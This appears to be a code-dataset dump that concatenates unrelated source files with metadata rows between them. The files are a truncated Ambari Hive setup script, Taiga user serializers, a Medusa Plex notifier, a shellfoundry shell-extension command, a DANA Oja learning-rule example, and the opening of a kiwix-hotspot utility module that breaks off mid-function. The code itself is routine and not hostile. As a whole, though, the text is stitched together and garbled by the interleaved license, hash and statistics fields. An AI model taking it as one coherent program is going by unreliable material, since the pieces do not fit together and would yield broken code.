if not params.whs_dir_protocol or params.whs_dir_protocol == urlparse(params.default_fs).scheme:
# Create Hive Metastore Warehouse Dir
params.HdfsResource(params.hive_apps_whs_dir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
group=params.user_group,
mode=params.hive_apps_whs_mode
)
else:
Logger.info(format("Not creating warehouse directory '{hive_apps_whs_dir}', as the location is not in DFS."))
# Create Hive User Dir
params.HdfsResource(params.hive_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
mode=params.hive_hdfs_user_mode
)
if not is_empty(params.hive_exec_scratchdir) and not urlparse(params.hive_exec_scratchdir).path.startswith("/tmp"):
params.HdfsResource(params.hive_exec_scratchdir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
group=params.hdfs_user,
mode=0777) # Hive expects this dir to be writeable by everyone as it is used as a temp dir
params.HdfsResource(None, action="execute")
def setup_non_client():
import params
Directory(params.hive_pid_dir,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
Directory(params.hive_log_dir,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
Directory(params.hive_var_lib,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
if params.hive_jdbc_target is not None and not os.path.exists(params.hive_jdbc_target):
jdbc_connector(params.hive_jdbc_target, params.hive_previous_jdbc_jar)
if params.hive2_jdbc_target is not None and not os.path.exists(params.hive2_jdbc_target):
jdbc_connector(params.hive2_jdbc_target, params.hive2_previous_jdbc_jar)
def setup_metastore():
import params
if params.hive_metastore_site_supported:
hivemetastore_site_config = get_config("hivemetastore-site")
if hivemetastore_site_config:
XmlConfig("hivemetastore-site.xml",
conf_dir=params.hive_server_conf_dir,
configurations=params.config['configurations']['hivemetastore-site'],
configuration_attributes=params.config['configuration_attributes']['hivemetastore-site'],
owner=params.hive_user,
group=params.user_group,
mode=0600)
File(os.path.join(params.hive_server_conf_dir, "hadoop-metrics2-hivemetastore.properties"),
owner=params.hive_user,
group=params.user_group,
content=Template("hadoop-metrics2-hivemetastore.properties.j2"),
mode=0600
)
File(params.start_metastore_path,
mode=0755,
content=StaticFile('startMetastore.sh')
)
if not is_empty(params.hive_exec_scratchdir):
dirPathStr = urlparse(params.hive_exec_scratchdir).path
pathComponents = dirPathStr.split("/")
if dirPathStr.startswith("/tmp") and len(pathComponents) > 2:
Directory (params.hive_exec_scratchdir,
owner = params.hive_user,
create_parents = True,
mode=0777)
def create_metastore_schema():
import params
create_schema_cmd = format("export HIVE_CONF_DIR={hive_server_conf_dir} ; "
"{hive_schematool_bin}/schematool -initSchema "
"-dbType {hive_metastore_db_type} "
"-userName {hive_metastore_user_name} "
"-passWord {hive_metastore_user_passwd!p} -verbose")
check_schema_created_cmd = as_user(format("export HIVE_CONF_DIR={hive_server_conf_dir} ; "
"{hive_schematool_bin}/schematool -info "
"-dbType {hive_metastore_db_type} "
"-userName {hive_metastore_user_name} "
"-passWord {hive_metastore_user_passwd!p} -verbose"), params.hive_user)
# HACK: in cases with quoted passwords and as_user (which does the quoting as well) !p won't work for hiding passwords.
# Fixing it with the hack below:
quoted_hive_metastore_user_passwd = quote_bash_args(quote_bash_args(params.hive_metastore_user_passwd))
if quoted_hive_metastore_user_passwd[0] == "'" and quoted_hive_metastore_user_passwd[-1] == "'" \
or quoted_hive_metastore_user_passwd[0] == '"' and quoted_hive_metastore_user_passwd[-1] == '"':
quoted_hive_metastore_user_passwd = quoted_hive_metastore_user_passwd[1:-1]
Logger.sensitive_strings[repr(check_schema_created_cmd)] = repr(check_schema_created_cmd.replace(
format("-passWord {quoted_hive_metastore_user_passwd}"), "-passWord " + utils.PASSWORDS_HIDE_STRING))
Execute(create_schema_cmd,
not_if = check_schema_created_cmd,
user = params.hive_user
)
"""
Writes configuration files required by Hive.
"""
def fill_conf_dir(component_conf_dir):
import params
hive_client_conf_path = os.path.realpath(format("{stack_root}/current/{component_directory}/conf"))
component_conf_dir = os.path.realpath(component_conf_dir)
mode_identified_for_file = 0644 if component_conf_dir == hive_client_conf_path else 0600
mode_identified_for_dir = 0755 if component_conf_dir == hive_client_conf_path else 0700
Directory(component_conf_dir,
owner=params.hive_user,
group=params.user_group,
create_parents = True,
mode=mode_identified_for_dir
)
if 'mapred-site' in params.config['configurations']:
XmlConfig("mapred-site.xml",
conf_dir=component_conf_dir,
configurations=params.config['configurations']['mapred-site'],
configuration_attributes=params.config['configuration_attributes']['mapred-site'],
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file)
File(format("{component_conf_dir}/hive-default.xml.template"),
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file
)
File(format("{component_conf_dir}/hive-env.sh.template"),
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file
)
# Create hive-log4j.properties and hive-exec-log4j.properties
# in /etc/hive/conf and not in /etc/hive2/conf
if params.log4j_version == '1':
log4j_exec_filename = 'hive-exec-log4j.properties'
if (params.log4j_exec_props != None):
File(format("{component_conf_dir}/{log4j_exec_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=InlineTemplate(params.log4j_exec_props)
)
elif (os.path.exists("{component_conf_dir}/{log4j_exec_filename}.template")):
File(format("{component_conf_dir}/{log4j_exec_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=StaticFile(format("{component_conf_dir}/{log4j_exec_filename}.template"))
)
log4j_filename = 'hive-log4j.properties'
if (params.log4j_props != None):
File(format("{component_conf_dir}/{log4j_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=InlineTemplate(params.log4j_props)
)
elif (os.path.exists("{component_conf_dir}/{log4j_filename}.template")):
File(format("{component_conf_dir}/{log4j_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=StaticFile(format("{component_conf_dir}/{log4j_filename}.template"))
)
if params.parquet_logging_properties is not None:
File(format("{component_conf_dir}/parquet-logging.properties"),
mode = mode_identified_for_file,
group = params.user_group,
owner = params.hive_user,
content = params.parquet_logging_properties)
def jdbc_connector(target, hive_previous_jdbc_jar):
"""
Shared by Hive Batch, Hive Metastore, and Hive Interactive
:param target: Target of jdbc jar name, which could be for any of the components above.
"""
import params
if not params.jdbc_jar_name:
return
if params.hive_jdbc_driver in params.hive_jdbc_drivers_list and params.hive_use_existing_db:
environment = {
"no_proxy": format("{ambari_server_hostname}")
}
if hive_previous_jdbc_jar and os.path.isfile(hive_previous_jdbc_jar):
File(hive_previous_jdbc_jar, action='delete')
# TODO: should be removed after ranger_hive_plugin will not provide jdbc
if params.prepackaged_jdbc_name != params.jdbc_jar_name:
Execute(('rm', '-f', params.prepackaged_ojdbc_symlink),
path=["/bin", "/usr/bin/"],
sudo = True)
File(params.downloaded_custom_connector,
content = DownloadSource(params.driver_curl_source))
# maybe it will be more correcvly to use db type
if params.sqla_db_used:
untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir)
Execute(untar_sqla_type2_driver, sudo = True)
Execute(format("yes | {sudo} cp {jars_path_in_archive} {hive_lib}"))
Directory(params.jdbc_libs_dir,
create_parents = True)
Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}"))
Execute(format("{sudo} chown -R {hive_user}:{user_group} {hive_lib}/*"))
else:
Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target),
#creates=target, TODO: uncomment after ranger_hive_plugin will not provide jdbc
path=["/bin", "/usr/bin/"],
sudo = True)
else:
#for default hive db (Mysql)
Execute(('cp', '--remove-destination', format('/usr/share/java/{jdbc_jar_name}'), target),
#creates=target, TODO: uncomment after ranger_hive_plugin will not provide jdbc
path=["/bin", "/usr/bin/"],
sudo=True
)
pass
File(target,
mode = 0644,
)
@OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY)
def hive(name=None):
import params
XmlConfig("hive-site.xml",
conf_dir = params.hive_conf_dir,
configurations = params.config['configurations']['hive-site'],
owner=params.hive_user,
configuration_attributes=params.config['configuration_attributes']['hive-site']
)
if name in ["hiveserver2","metastore"]:
# Manually overriding service logon user & password set by the installation package
service_name = params.service_map[name]
ServiceConfig(service_name,
action="change_user",
username = params.hive_user,
password = Script.get_password(params.hive_user))
Execute(format("cmd /c hadoop fs -mkdir -p {hive_warehouse_dir}"), logoutput=True, user=params.hadoop_user)
if name == 'metastore':
if params.init_metastore_schema:
check_schema_created_cmd = format('cmd /c "{hive_bin}\\hive.cmd --service schematool -info '
'-dbType {hive_metastore_db_type} '
'-userName {hive_metastore_user_name} '
'-passWord {hive_metastore_user_passwd!p}'
'&set EXITCODE=%ERRORLEVEL%&exit /B %EXITCODE%"', #cmd "feature", propagate the process exit code manually
hive_bin=params.hive_bin,
hive_metastore_db_type=params.hive_metastore_db_type,
hive_metastore_user_name=params.hive_metastore_user_name,
hive_metastore_user_passwd=params.hive_metastore_user_passwd)
try:
Execute(check_schema_created_cmd)
except Fail:
create_schema_cmd = format('cmd /c {hive_bin}\\hive.cmd --service schematool -initSchema '
'-dbType {hive_metastore_db_type} '
'-userName {hive_metastore_user_name} '
'-passWord {hive_metastore_user_passwd!p}',
hive_bin=params.hive_bin,
hive_metastore_db_type=params.hive_metastore_db_type,
hive_metastore_user_name=params.hive_metastore_user_name,
hive_metastore_user_passwd=params.hive_metastore_user_passwd)
Execute(create_schema_cmd,
user = params.hive_user,
logoutput=True
)
if name == "hiveserver2":
if params.hive_execution_engine == "tez":
# Init the tez app dir in hadoop
script_file = __file__.replace('/', os.sep)
cmd_file = os.path.normpath(os.path.join(os.path.dirname(script_file), "..", "files", "hiveTezSetup.cmd"))
Execute("cmd /c " + cmd_file, logoutput=True, user=params.hadoop_user)
| apache-2.0 | -4,470,074,220,140,164,000 | 42.205224 | 147 | 0.630883 | false | 3.822083 | true | false | false |
seanchen/taiga-back | taiga/users/serializers.py | 1 | 5786 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core import validators
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from taiga.base.api import serializers
from taiga.base.fields import PgArrayField
from taiga.projects.models import Project
from .models import User, Role
from .services import get_photo_or_gravatar_url, get_big_photo_or_gravatar_url
import re
######################################################
## User
######################################################
class ContactProjectDetailSerializer(serializers.ModelSerializer):
class Meta:
model = Project
fields = ("id", "slug", "name")
class UserSerializer(serializers.ModelSerializer):
full_name_display = serializers.SerializerMethodField("get_full_name_display")
photo = serializers.SerializerMethodField("get_photo")
big_photo = serializers.SerializerMethodField("get_big_photo")
roles = serializers.SerializerMethodField("get_roles")
projects_with_me = serializers.SerializerMethodField("get_projects_with_me")
class Meta:
model = User
# IMPORTANT: Maintain the UserAdminSerializer Meta up to date
# with this info (including there the email)
fields = ("id", "username", "full_name", "full_name_display",
"color", "bio", "lang", "theme", "timezone", "is_active",
"photo", "big_photo", "roles", "projects_with_me")
read_only_fields = ("id",)
def validate_username(self, attrs, source):
value = attrs[source]
validator = validators.RegexValidator(re.compile('^[\w.-]+$'), _("invalid username"),
_("invalid"))
try:
validator(value)
except ValidationError:
raise serializers.ValidationError(_("Required. 255 characters or fewer. Letters, "
"numbers and /./-/_ characters'"))
if (self.object and
self.object.username != value and
User.objects.filter(username=value).exists()):
raise serializers.ValidationError(_("Invalid username. Try with a different one."))
return attrs
def get_full_name_display(self, obj):
return obj.get_full_name() if obj else ""
def get_photo(self, user):
return get_photo_or_gravatar_url(user)
def get_big_photo(self, user):
return get_big_photo_or_gravatar_url(user)
def get_roles(self, user):
return user.memberships. order_by("role__name").values_list("role__name", flat=True).distinct()
def get_projects_with_me(self, user):
request = self.context.get("request", None)
requesting_user = request and request.user or None
if not requesting_user or not requesting_user.is_authenticated():
return []
else:
project_ids = requesting_user.memberships.values_list("project__id", flat=True)
memberships = user.memberships.filter(project__id__in=project_ids)
project_ids = memberships.values_list("project__id", flat=True)
projects = Project.objects.filter(id__in=project_ids)
return ContactProjectDetailSerializer(projects, many=True).data
class UserAdminSerializer(UserSerializer):
class Meta:
model = User
# IMPORTANT: Maintain the UserSerializer Meta up to date
# with this info (including here the email)
fields = ("id", "username", "full_name", "full_name_display", "email",
"color", "bio", "lang", "theme", "timezone", "is_active", "photo",
"big_photo")
read_only_fields = ("id", "email")
class BasicInfoSerializer(UserSerializer):
class Meta:
model = User
fields = ("username", "full_name_display","photo", "big_photo")
class RecoverySerializer(serializers.Serializer):
token = serializers.CharField(max_length=200)
password = serializers.CharField(min_length=6)
class ChangeEmailSerializer(serializers.Serializer):
email_token = serializers.CharField(max_length=200)
class CancelAccountSerializer(serializers.Serializer):
cancel_token = serializers.CharField(max_length=200)
######################################################
## Role
######################################################
class RoleSerializer(serializers.ModelSerializer):
members_count = serializers.SerializerMethodField("get_members_count")
permissions = PgArrayField(required=False)
class Meta:
model = Role
fields = ('id', 'name', 'permissions', 'computable', 'project', 'order', 'members_count')
i18n_fields = ("name",)
def get_members_count(self, obj):
return obj.memberships.count()
class ProjectRoleSerializer(serializers.ModelSerializer):
class Meta:
model = Role
fields = ('id', 'name', 'slug', 'order', 'computable')
i18n_fields = ("name",)
| agpl-3.0 | 3,606,832,449,048,560,600 | 37.56 | 103 | 0.639523 | false | 4.182213 | false | false | false |
FireBladeNooT/Medusa_1_6 | medusa/notifiers/plex.py | 1 | 10632 | # coding=utf-8
# Author: Dustyn Gibson <[email protected]>
#
# This file is part of Medusa.
#
# Medusa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Medusa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Medusa. If not, see <http://www.gnu.org/licenses/>.
import re
from six import iteritems
from .. import app, common, logger
from ..helper.exceptions import ex
from ..helpers import getURL, make_session
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
class Notifier(object):
def __init__(self):
self.headers = {
'X-Plex-Device-Name': 'Medusa',
'X-Plex-Product': 'Medusa Notifier',
'X-Plex-Client-Identifier': common.USER_AGENT,
'X-Plex-Version': '2016.02.10'
}
self.session = make_session()
@staticmethod
def _notify_pht(message, title='Medusa', host=None, username=None, password=None, force=False): # pylint: disable=too-many-arguments
"""Internal wrapper for the notify_snatch and notify_download functions
Args:
message: Message body of the notice to send
title: Title of the notice to send
host: Plex Home Theater(s) host:port
username: Plex username
password: Plex password
force: Used for the Test method to override config safety checks
Returns:
Returns a list results in the format of host:ip:result
The result will either be 'OK' or False, this is used to be parsed by the calling function.
"""
from . import kodi_notifier
# suppress notifications if the notifier is disabled but the notify options are checked
if not app.USE_PLEX_CLIENT and not force:
return False
host = host or app.PLEX_CLIENT_HOST
username = username or app.PLEX_CLIENT_USERNAME
password = password or app.PLEX_CLIENT_PASSWORD
return kodi_notifier._notify_kodi(message, title=title, host=host, username=username, password=password, force=force, dest_app="PLEX") # pylint: disable=protected-access
##############################################################################
# Public functions
##############################################################################
def notify_snatch(self, ep_name, is_proper):
if app.PLEX_NOTIFY_ONSNATCH:
self._notify_pht(ep_name, common.notifyStrings[(common.NOTIFY_SNATCH, common.NOTIFY_SNATCH_PROPER)[is_proper]])
def notify_download(self, ep_name):
if app.PLEX_NOTIFY_ONDOWNLOAD:
self._notify_pht(ep_name, common.notifyStrings[common.NOTIFY_DOWNLOAD])
def notify_subtitle_download(self, ep_name, lang):
if app.PLEX_NOTIFY_ONSUBTITLEDOWNLOAD:
self._notify_pht(ep_name + ': ' + lang, common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD])
def notify_git_update(self, new_version='??'):
if app.NOTIFY_ON_UPDATE:
update_text = common.notifyStrings[common.NOTIFY_GIT_UPDATE_TEXT]
title = common.notifyStrings[common.NOTIFY_GIT_UPDATE]
if update_text and title and new_version:
self._notify_pht(update_text + new_version, title)
def notify_login(self, ipaddress=""):
if app.NOTIFY_ON_LOGIN:
update_text = common.notifyStrings[common.NOTIFY_LOGIN_TEXT]
title = common.notifyStrings[common.NOTIFY_LOGIN]
if update_text and title and ipaddress:
self._notify_pht(update_text.format(ipaddress), title)
def test_notify_pht(self, host, username, password):
return self._notify_pht('This is a test notification from Medusa',
'Test Notification', host, username, password, force=True)
def test_notify_pms(self, host, username, password, plex_server_token):
return self.update_library(host=host, username=username, password=password,
plex_server_token=plex_server_token, force=True)
def update_library(self, ep_obj=None, host=None, # pylint: disable=too-many-arguments, too-many-locals, too-many-statements, too-many-branches
username=None, password=None,
plex_server_token=None, force=False):
"""Handles updating the Plex Media Server host via HTTP API
Plex Media Server currently only supports updating the whole video library and not a specific path.
Returns:
Returns None for no issue, else a string of host with connection issues
"""
if not (app.USE_PLEX_SERVER and app.PLEX_UPDATE_LIBRARY) and not force:
return None
host = host or app.PLEX_SERVER_HOST
if not host:
logger.log(u'PLEX: No Plex Media Server host specified, check your settings', logger.DEBUG)
return False
if not self.get_token(username, password, plex_server_token):
logger.log(u'PLEX: Error getting auth token for Plex Media Server, check your settings', logger.WARNING)
return False
file_location = '' if not ep_obj else ep_obj.location
host_list = {x.strip() for x in host.split(',') if x.strip()}
hosts_all = hosts_match = {}
hosts_failed = set()
for cur_host in host_list:
url = 'http{0}://{1}/library/sections'.format(('', 's')[bool(app.PLEX_SERVER_HTTPS)], cur_host)
try:
xml_response = getURL(url, headers=self.headers, session=self.session, returns='text')
if not xml_response:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(cur_host), logger.WARNING)
hosts_failed.add(cur_host)
continue
media_container = etree.fromstring(xml_response)
except IOError as error:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
continue
except Exception as error:
if 'invalid token' in str(error):
logger.log(u'PLEX: Please set TOKEN in Plex settings: ', logger.WARNING)
else:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
continue
sections = media_container.findall('.//Directory')
if not sections:
logger.log(u'PLEX: Plex Media Server not running on: {0}'.format
(cur_host), logger.DEBUG)
hosts_failed.add(cur_host)
continue
for section in sections:
if 'show' == section.attrib['type']:
keyed_host = [(str(section.attrib['key']), cur_host)]
hosts_all.update(keyed_host)
if not file_location:
continue
for section_location in section.findall('.//Location'):
section_path = re.sub(r'[/\\]+', '/', section_location.attrib['path'].lower())
section_path = re.sub(r'^(.{,2})[/\\]', '', section_path)
location_path = re.sub(r'[/\\]+', '/', file_location.lower())
location_path = re.sub(r'^(.{,2})[/\\]', '', location_path)
if section_path in location_path:
hosts_match.update(keyed_host)
if force:
return (', '.join(set(hosts_failed)), None)[not len(hosts_failed)]
if hosts_match:
logger.log(u'PLEX: Updating hosts where TV section paths match the downloaded show: ' + ', '.join(set(hosts_match)), logger.DEBUG)
else:
logger.log(u'PLEX: Updating all hosts with TV sections: ' + ', '.join(set(hosts_all)), logger.DEBUG)
hosts_try = (hosts_match.copy(), hosts_all.copy())[not len(hosts_match)]
for section_key, cur_host in iteritems(hosts_try):
url = 'http{0}://{1}/library/sections/{2}/refresh'.format(('', 's')[bool(app.PLEX_SERVER_HTTPS)], cur_host, section_key)
try:
getURL(url, headers=self.headers, session=self.session, returns='text')
except Exception as error:
logger.log(u'PLEX: Error updating library section for Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
return (', '.join(set(hosts_failed)), None)[not len(hosts_failed)]
def get_token(self, username=None, password=None, plex_server_token=None):
username = username or app.PLEX_SERVER_USERNAME
password = password or app.PLEX_SERVER_PASSWORD
plex_server_token = plex_server_token or app.PLEX_SERVER_TOKEN
if plex_server_token:
self.headers['X-Plex-Token'] = plex_server_token
if 'X-Plex-Token' in self.headers:
return True
if not (username and password):
return True
logger.log(u'PLEX: fetching plex.tv credentials for user: ' + username, logger.DEBUG)
params = {
'user[login]': username,
'user[password]': password
}
try:
response = getURL('https://plex.tv/users/sign_in.json',
post_data=params,
headers=self.headers,
session=self.session,
returns='json')
self.headers['X-Plex-Token'] = response['user']['authentication_token']
except Exception as error:
self.headers.pop('X-Plex-Token', '')
logger.log(u'PLEX: Error fetching credentials from from plex.tv for user {0}: {1}'.format
(username, error), logger.DEBUG)
return 'X-Plex-Token' in self.headers
| gpl-3.0 | 4,151,996,194,805,680,000 | 42.219512 | 178 | 0.586155 | false | 4.125728 | false | false | false |
QualiSystems/shellfoundry | shellfoundry/commands/extend_command.py | 1 | 6915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import re
import shutil
import click
from shellfoundry.exceptions import VersionRequestException
from shellfoundry.utilities.config_reader import CloudShellConfigReader, Configuration
from shellfoundry.utilities.constants import (
METADATA_AUTHOR_FIELD,
TEMPLATE_AUTHOR_FIELD,
TEMPLATE_BASED_ON,
)
from shellfoundry.utilities.modifiers.definition.definition_modification import (
DefinitionModification,
)
from shellfoundry.utilities.repository_downloader import RepositoryDownloader
from shellfoundry.utilities.temp_dir_context import TempDirContext
from shellfoundry.utilities.validations import (
ShellGenerationValidations,
ShellNameValidations,
)
class ExtendCommandExecutor(object):
LOCAL_TEMPLATE_URL_PREFIX = "local:"
SIGN_FILENAME = "signed"
ARTIFACTS = {"driver": "src", "deployment": "deployments"}
def __init__(
self,
repository_downloader=None,
shell_name_validations=None,
shell_gen_validations=None,
):
"""Creates a new shell based on an already existing shell.
:param RepositoryDownloader repository_downloader:
:param ShellNameValidations shell_name_validations:
"""
self.repository_downloader = repository_downloader or RepositoryDownloader()
self.shell_name_validations = shell_name_validations or ShellNameValidations()
self.shell_gen_validations = (
shell_gen_validations or ShellGenerationValidations()
)
self.cloudshell_config_reader = Configuration(CloudShellConfigReader())
def extend(self, source, attribute_names):
"""Create a new shell based on an already existing shell.
:param str source: The path to the existing shell. Can be a url or local path
:param tuple attribute_names: Sequence of attribute names that should be added
"""
with TempDirContext("Extended_Shell_Temp_Dir") as temp_dir:
try:
if self._is_local(source):
temp_shell_path = self._copy_local_shell(
self._remove_prefix(
source, ExtendCommandExecutor.LOCAL_TEMPLATE_URL_PREFIX
),
temp_dir,
)
else:
temp_shell_path = self._copy_online_shell(source, temp_dir)
except VersionRequestException as err:
raise click.ClickException(str(err))
except Exception:
raise click.BadParameter("Check correctness of entered attributes")
# Remove shell version from folder name
shell_path = re.sub(r"-\d+(\.\d+)*/?$", "", temp_shell_path)
os.rename(temp_shell_path, shell_path)
if not self.shell_gen_validations.validate_2nd_gen(shell_path):
raise click.ClickException("Invalid second generation Shell.")
modificator = DefinitionModification(shell_path)
self._unpack_driver_archive(shell_path, modificator)
self._remove_quali_signature(shell_path)
self._change_author(shell_path, modificator)
self._add_based_on(shell_path, modificator)
self._add_attributes(shell_path, attribute_names)
try:
shutil.move(shell_path, os.path.curdir)
except shutil.Error as err:
raise click.BadParameter(str(err))
click.echo("Created shell based on source {}".format(source))
def _copy_local_shell(self, source, destination):
"""Copy shell and extract if needed."""
if os.path.isdir(source):
source = source.rstrip(os.sep)
name = os.path.basename(source)
ext_shell_path = os.path.join(destination, name)
shutil.copytree(source, ext_shell_path)
else:
raise
return ext_shell_path
def _copy_online_shell(self, source, destination):
"""Download shell and extract it."""
archive_path = None
try:
archive_path = self.repository_downloader.download_file(source, destination)
ext_shell_path = (
self.repository_downloader.repo_extractor.extract_to_folder(
archive_path, destination
)
)
ext_shell_path = ext_shell_path[0]
finally:
if archive_path and os.path.exists(archive_path):
os.remove(archive_path)
return os.path.join(destination, ext_shell_path)
@staticmethod
def _is_local(source):
return source.startswith(ExtendCommandExecutor.LOCAL_TEMPLATE_URL_PREFIX)
@staticmethod
def _remove_prefix(string, prefix):
return string.rpartition(prefix)[-1]
def _unpack_driver_archive(self, shell_path, modificator=None):
"""Unpack driver files from ZIP-archive."""
if not modificator:
modificator = DefinitionModification(shell_path)
artifacts = modificator.get_artifacts_files(
artifact_name_list=list(self.ARTIFACTS.keys())
)
for artifact_name, artifact_path in artifacts.items():
artifact_path = os.path.join(shell_path, artifact_path)
if os.path.exists(artifact_path):
self.repository_downloader.repo_extractor.extract_to_folder(
artifact_path,
os.path.join(shell_path, self.ARTIFACTS[artifact_name]),
)
os.remove(artifact_path)
@staticmethod
def _remove_quali_signature(shell_path):
"""Remove Quali signature from shell."""
signature_file_path = os.path.join(
shell_path, ExtendCommandExecutor.SIGN_FILENAME
)
if os.path.exists(signature_file_path):
os.remove(signature_file_path)
def _change_author(self, shell_path, modificator=None):
"""Change shell authoring."""
author = self.cloudshell_config_reader.read().author
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.edit_definition(field=TEMPLATE_AUTHOR_FIELD, value=author)
modificator.edit_tosca_meta(field=METADATA_AUTHOR_FIELD, value=author)
def _add_based_on(self, shell_path, modificator=None):
"""Add Based_ON field to shell-definition.yaml file."""
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.add_field_to_definition(field=TEMPLATE_BASED_ON)
def _add_attributes(self, shell_path, attribute_names, modificator=None):
"""Add a commented out attributes to the shell definition."""
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.add_properties(attribute_names=attribute_names)
| apache-2.0 | 2,709,334,728,992,063,500 | 36.994505 | 88 | 0.635141 | false | 4.231946 | true | false | false |
rougier/dana | examples/oja.py | 1 | 3086 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright INRIA
# Contributors: Nicolas P. Rougier ([email protected])
#
# DANA is a computing framework for the simulation of distributed,
# asynchronous, numerical and adaptive models.
#
# This software is governed by the CeCILL license under French law and abiding
# by the rules of distribution of free software. You can use, modify and/ or
# redistribute the software under the terms of the CeCILL license as circulated
# by CEA, CNRS and INRIA at the following URL
# http://www.cecill.info/index.en.html.
#
# As a counterpart to the access to the source code and rights to copy, modify
# and redistribute granted by the license, users are provided only with a
# limited warranty and the software's author, the holder of the economic
# rights, and the successive licensors have only limited liability.
#
# In this respect, the user's attention is drawn to the risks associated with
# loading, using, modifying and/or developing or reproducing the software by
# the user in light of its specific status of free software, that may mean that
# it is complicated to manipulate, and that also therefore means that it is
# reserved for developers and experienced professionals having in-depth
# computer knowledge. Users are therefore encouraged to load and test the
# software's suitability as regards their requirements in conditions enabling
# the security of their systems and/or data to be ensured and, more generally,
# to use and operate it in the same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL license and that you accept its terms.
# -----------------------------------------------------------------------------
'''
Implementation of the Oja learning rule for extracting the principal component
of an elliptical gaussian distribution. Given that the distribution is
elliptical, its principal component should be oriented along the main axis of
the distribution, therefore, final weights should be +/-cos(theta), sin(theta)
References:
-----------
E. Oja, "A Simplified Neuron Model as a Principal Component Analyzer"
Journal of Mathematical Biology 15: 267-273, 1982.
'''
from numpy import *
from dana import *
def sample(theta, mu1, std1, mu2, std2):
''' Random sample according to an elliptical Gaussian distribution'''
u1 = random.random()
u2 = random.random()
T1 = sqrt(-2.0*log(u1))*cos(2.0*pi*u2)
T2 = sqrt(-2.0*log(u1))*sin(2.0*pi*u2)
x = mu1 + (std1*T1*cos(theta) - std2*T2*sin(theta))
y = mu2 + (std1*T1*sin(theta) + std2*T2*cos(theta))
return np.array([x,y])
theta = -135.0 * pi / 180.0
src = Group((2,), 'V = sample(theta,0.0,1.0,0.0,0.5)')
tgt = Group((1,), 'V')
C = DenseConnection(src('V'), tgt('V'), np.ones((1,2)),
'dW/dt = post.V*(pre.V-post.V*W)')
run(time=10.0,dt=0.001)
print "Learned weights : ", C.weights[0]
print "(should be +/- [%f, %f])" % (cos(theta), sin(theta))
| bsd-3-clause | -3,846,490,947,212,068,000 | 44.382353 | 79 | 0.685677 | false | 3.510808 | false | false | false |
ideascube/pibox-installer | kiwix-hotspot/backend/util.py | 1 | 15466 | # -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
import os
import re
import sys
import time
import shlex
import signal
import ctypes
import tempfile
import threading
import subprocess
import data
from util import CLILogger
# windows-only flags to prevent sleep on executing thread
WINDOWS_SLEEP_FLAGS = {
# Enables away mode. This value must be specified with ES_CONTINUOUS.
# Away mode should be used only by media-recording and media-distribution
# applications that must perform critical background processing
# on desktop computers while the computer appears to be sleeping.
"ES_AWAYMODE_REQUIRED": 0x00000040,
# Informs the system that the state being set should remain in effect until
# the next call that uses ES_CONTINUOUS and one of the other state flags is cleared.
"ES_CONTINUOUS": 0x80000000,
# Forces the display to be on by resetting the display idle timer.
"ES_DISPLAY_REQUIRED": 0x00000002,
# Forces the system to be in the working state by resetting the system idle timer.
"ES_SYSTEM_REQUIRED": 0x00000001,
}
class CheckCallException(Exception):
def __init__(self, msg):
Exception(self, msg)
def startup_info_args():
if hasattr(subprocess, "STARTUPINFO"):
# On Windows, subprocess calls will pop up a command window by default
# when run from Pyinstaller with the ``--noconsole`` option. Avoid this
# distraction.
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
cf = subprocess.CREATE_NEW_PROCESS_GROUP
else:
